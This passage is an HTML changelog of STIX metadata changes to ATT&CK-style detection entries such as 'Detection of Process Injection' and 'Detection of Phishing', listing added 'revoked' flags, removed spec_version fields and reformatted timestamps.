Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0639] Detection of Network Denial of Service</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0696] Detection of Network Service Scanning</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0706] Detection of Non-Standard Port</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0720] Detection of Obfuscated Files or Information</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0610] Detection of One-Way Communication</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0688] Detection of Out of Band Data</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0684] Detection of Phishing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0598] Detection of Prevent Application Removal</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0692] Detection of Process Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0632] Detection of Process Injection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0681] Detection of Protected User Data</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0631] Detection of Proxy Through Victim</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0622] Detection of Ptrace System Calls</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0624] Detection of Remote Access Software</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0702] Detection of Remote Device Management Services</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0691] Detection of Replication Through Removable Media</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid 